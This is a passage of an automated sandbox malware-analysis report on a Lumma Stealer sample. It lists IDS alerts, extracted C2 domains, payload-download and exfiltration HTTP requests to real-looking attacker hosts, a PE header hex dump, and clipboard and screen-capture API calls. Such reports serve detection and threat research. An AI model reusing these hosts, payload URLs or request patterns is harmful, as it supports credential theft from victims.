Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], FD743AC4h	5_2_00438FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4E66B5A3h	5_2_004387C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [eax+ebp*8], B62B8D10h	5_2_00426FD0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057284 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (knifedxejsu .cyou) : 192.168.2.9:63293 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.2.9:49766 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.2.9:49755 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.2.9:49738 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.2.9:49749 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.2.9:49772 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.2.9:49794 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.2.9:49805 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2057285 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI) : 192.168.2.9:49788 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49738 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49738 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49794 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49749 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49749 -> 172.67.187.9:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: conceszustyb.shop
Source: Malware configuration extractor	URLs: worddosofrm.shop
Source: Malware configuration extractor	URLs: standartedby.shop
Source: Malware configuration extractor	URLs: knifedxejsu.cyou
Source: Malware configuration extractor	URLs: nightybinybz.shop
Source: Malware configuration extractor	URLs: bakedstusteeb.shop
Source: Malware configuration extractor	URLs: moutheventushz.shop
Source: Malware configuration extractor	URLs: respectabosiz.shop
Source: Malware configuration extractor	URLs: mutterissuen.shop

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 08 Nov 2024 11:02:29 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 06 Nov 2024 18:11:21 GMTETag: "4c200-6264271ea9617"Accept-Ranges: bytesContent-Length: 311808Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 91 33 25 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f8 03 00 00 c6 00 00 00 00 00 00 00 d4 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 30 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 3c 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 31 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a f6 03 00 00 10 00 00 00 f8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5d 25 00 00 00 10 04 00 00 26 00 00 00 fc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 70 f0 00 00 00 40 04 00 00 5e 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 3c 41 00 00 00 40 05 00 00 42 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /infopage/tbg9.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 147.45.44.131 147.45.44.131

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49766 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.9:49717 -> 147.45.44.131:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49738 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49749 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49772 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49755 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49794 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49805 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49788 -> 172.67.187.9:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.9:49816
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.9:49983

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: knifedxejsu.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: knifedxejsu.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3194BVERV3B73RVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12859Host: knifedxejsu.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=83DMPBQZRJR73RVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15065Host: knifedxejsu.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4E4KM2ER33VJ7RVVVVVVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20623Host: knifedxejsu.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0ME6R0JBVZ3JRVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1231Host: knifedxejsu.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NT0XG1U7R7VR3RVVVVVVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1140Host: knifedxejsu.cyou

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131

Source: global traffic

HTTP traffic detected: GET /infopage/tbg9.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: knifedxejsu.cyou

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: knifedxejsu.cyou

Source: TZ33WZy6QL.exe, 00000000.00000002.1383275515.00000000026AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131
Source: TZ33WZy6QL.exe, 00000000.00000002.1383275515.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/tbg9.exe
Source: TZ33WZy6QL.exe, 00000000.00000002.1383275515.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/tbg9.exeP
Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftFd
Source: TZ33WZy6QL.exe, 00000000.00000002.1383275515.00000000026AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000005.00000002.1503278370.0000000001235000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou/
Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou/-
Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou/8
Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1503116398.00000000011C2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1503361106.000000000124C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou/api
Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou/apiO
Source: RegAsm.exe, 00000005.00000002.1503116398.00000000011CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou/s
Source: RegAsm.exe, 00000005.00000002.1503409382.0000000001252000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou:443/api
Source: RegAsm.exe, 00000005.00000002.1503409382.0000000001252000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou:443/apiHtPyoG
Source: RegAsm.exe, 00000005.00000002.1503409382.0000000001252000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou:443/apid8pi.default-release/key4.dbPK
Source: RegAsm.exe, 00000005.00000002.1503409382.0000000001252000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://knifedxejsu.cyou:443/apioufONBU$

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443

Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49794 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00430850 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_00430850

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00430850 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_00430850

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00430A30 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

5_2_00430A30

System Summary

.NET source code contains very large strings

Source: TZ33WZy6QL.exe, Iceberg.cs

Long String: Length: 18812

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004358F0	5_2_004358F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043F9D0	5_2_0043F9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00421A80	5_2_00421A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00440330	5_2_00440330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00418D6F	5_2_00418D6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042B503	5_2_0042B503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041FDF0	5_2_0041FDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00435700	5_2_00435700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004247C0	5_2_004247C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041B840	5_2_0041B840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042E040	5_2_0042E040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043D840	5_2_0043D840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00427850	5_2_00427850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040A070	5_2_0040A070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00401000	5_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042B0EC	5_2_0042B0EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00425892	5_2_00425892
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043C891	5_2_0043C891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042D094	5_2_0042D094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043609F	5_2_0043609F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004230A6	5_2_004230A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040F0B0	5_2_0040F0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00439140	5_2_00439140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00439940	5_2_00439940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00408960	5_2_00408960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040C170	5_2_0040C170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041911F	5_2_0041911F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00426122	5_2_00426122
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041C920	5_2_0041C920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004301C0	5_2_004301C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040B1D0	5_2_0040B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043E9A0	5_2_0043E9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004039B0	5_2_004039B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004209B0	5_2_004209B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00401277	5_2_00401277
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043E212	5_2_0043E212
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040DA20	5_2_0040DA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041D220	5_2_0041D220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00409340	5_2_00409340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040AB40	5_2_0040AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043D340	5_2_0043D340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041A360	5_2_0041A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00421379	5_2_00421379
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00428B00	5_2_00428B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043C311	5_2_0043C311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00401319	5_2_00401319
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00425B22	5_2_00425B22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00433BC3	5_2_00433BC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004333D3	5_2_004333D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004353B0	5_2_004353B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042AC42	5_2_0042AC42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00409C61	5_2_00409C61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00424C70	5_2_00424C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043FCC0	5_2_0043FCC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00414C80	5_2_00414C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042AC85	5_2_0042AC85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00436490	5_2_00436490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042D495	5_2_0042D495
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042AC9C	5_2_0042AC9C
